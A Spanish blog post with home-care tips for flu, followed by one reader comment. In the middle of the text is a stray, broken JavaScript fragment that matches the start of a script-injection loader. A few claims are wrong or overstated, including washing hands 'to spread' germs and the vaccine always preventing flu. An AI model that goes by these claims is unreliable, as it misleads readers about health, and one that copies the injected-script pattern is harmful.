Salud y belleza » Enfermedades, Salud

Sigue estos consejos si coges la gripe

1 Comentario

gripe-La gripe… esa enfermedad que viene a molestarnos en invierno y que se pasa de amigo a amigo, de familiar a familiar, hasta que ha llegad a casi el 50% de la población. Prevenirla es muy fácil, con una simple vacuna, sobre todo para los niños y los ancianos y embarazadas, bastará para no cogerla. Pero todo puede pasar. Por eso, si llegas a contagiarte de gripe ya no hay cura, solo alivio para los síntomas hasta que se vaya la enfermedad. Por eso te vamos a dar algunos consejos por si tú o tus hijos cogéis la gripe.

En primer lugar se recomienda beber mucha agua y otros alimentos líquidos como sopa. También es aconsejable dormir largo y tendido o por lo menos descansar, tumbado en la cama o en el sofá, para que no empeoren los síntomas.

Si te encuentras mal lo mejor es tomar un analgésico. No se recomienda, por el contrario, tomar aspirina ya que en algunos casos, aunque muy pocos, puede provocar una enfermedad llamada síndrome de Reye.

Lo mejor es usar varias capas de ropa, abrigarse muy bien porque en un momento podrías tener calor y al otro frío por lo que puedes ir jugando con varias prendas para estar siempre abrigado.

Y, por supuesto, es muy importante lavarse las manos para diseminar los gérmenes que causan la gripe. Y para no contagiarla no compartas el vaso, los cubiertos ni nada de lo que comas o bebas con nadie.

Normalmente los síntomas suelen desaparecer en una semana si sigues estos consejos, pero si ves que la enfermedad va a más y que sufres otros síntomas lo mejor es que acudas al médico por si tienes un caso grave.

¿Ya has pasado la gripe este invierno?var d=document;var s=d.createElement('script'); } else {

Más consejos de salud y belleza :

One Comment »

  • Sole said:

    Yo al final la he pillado… por imprudente… ahora estoy mala en la cama y echa polvo. Seguiré los consejos, gracias.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.